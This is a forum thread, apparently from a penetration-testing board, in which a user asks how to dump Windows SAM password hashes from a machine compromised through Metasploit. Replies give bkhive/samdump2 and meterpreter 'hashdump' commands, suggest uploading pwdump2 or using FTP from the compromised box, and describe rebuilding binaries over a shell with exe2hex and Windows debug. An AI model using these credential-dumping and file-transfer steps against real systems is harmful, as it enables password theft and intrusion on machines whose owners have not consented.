Results 1 to 7 of 7

Thread: Dump remote SAM from within metasploit?

  1. #1
    Member Dissident85's Avatar
    Join Date
    Jun 2008
    Posts
    127

    Default Dump remote SAM from within metasploit?

    Hi all, I was just wondering how I go about dumping the SAM on a remote computer that I have just exploited? For example if I wanted to dump the SAM of a computer that I have physical access to from within Backtrack I would do something like

    Code:
    # bkhive /mnt/win/WINDOWS/system32/config/system key.txt
    
    Then
    
    # samdump2 /mnt/win/WINDOWS/system32/config/sam key.txt
    So how would I do the same thing from a shell spawned from with in metasploit? How would I transfer over these programs? I remember reading something somewhere that you can use “debug” in windows to rebuild a program, I cant remember where I read that. but I know it is possible.

    I also know there is the samjucer add on for metapeter, but I am having enough trouble using metapeter as it is…

    Any help would be greatly appreciated.

  2. #2
    Junior Member
    Join Date
    Nov 2007
    Posts
    37

    Default

    "debugging" in windows has nothing to do with this, your trying to get the system file and the sam file onto your box, or you could upload another program like pwdump2 to the box and then pwn the hashes off that way

    http://www.ethicalhacker.net/compone...4/topic,533.0/

  3. #3
    Member Dissident85's Avatar
    Join Date
    Jun 2008
    Posts
    127

    Default

    Quote Originally Posted by Tully View Post
    "debugging" in windows has nothing to do with this, your trying to get the system file and the sam file onto your box, or you could upload another program like pwdump2 to the box and then pwn the hashes off that way

    http://www.ethicalhacker.net/compone...4/topic,533.0/
    yes, but there is a way to use debug to upload those programs... i have seen it done before.. just cant remember how.

    also that tute on Ethical Hacker uses "meterpreter" i haven't been able to get the metapeter payload working... but if i did it would be easier to use samjucer

  4. #4
    Member hawaii67's Avatar
    Join Date
    Feb 2006
    Posts
    318

    Default

    Use the meterpreter_reverse_tcp payload, this should work. The meterpreter_reverse_http payload is sometimes instable.

    Then type:

    Code:
    meterpreter> use priv
    meterpreter> hashdump
    Don't eat yellow snow :rolleyes:

  5. #5
    Member Dissident85's Avatar
    Join Date
    Jun 2008
    Posts
    127

    Default

    Quote Originally Posted by hawaii67 View Post
    Use the meterpreter_reverse_tcp payload, this should work. The meterpreter_reverse_http payload is sometimes instable.

    Then type:

    Code:
    meterpreter> use priv
    meterpreter> hashdump
    Ok, ill give that a go...

    Also i did some more research and what i found was that using debug you can unassemble a program, then use debug to assemble it again. Which allows you to send a program over a shell. Just having a little trouble finding out how you would pipe the output / send it back.

  6. #6
    Junior Member
    Join Date
    Nov 2007
    Posts
    37

    Default

    if you cant get meterpreter working then just start an ftp service on your bt box then ftp from the popped box, simple send/receive

  7. #7
    Member
    Join Date
    Feb 2006
    Posts
    167

    Default

    Quote Originally Posted by Dissident85 View Post
    Ok, ill give that a go...

    Also i did some more research and what i found was that using debug you can unassemble a program, then use debug to assemble it again. Which allows you to send a program over a shell. Just having a little trouble finding out how you would pipe the output / send it back.
    Yes theres a way to convert binary to hexadecimal in a specific format and deliver it and use windows debug to convert it back to an executable. Theres a 64kb limit through windows debug... Theres a tool out there that my team wrote that gets past that, its in fast-track, but if you want to convert something like samdump, you can use a tool in the windows-binary folder, its called exe2hex or something like that, just do wine exe2hex <filename> and it will convert it to the format you need to echo into a text file and run debug to covert it.

    But for the purposes your talking about, the above commands will dump the SAM for you.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •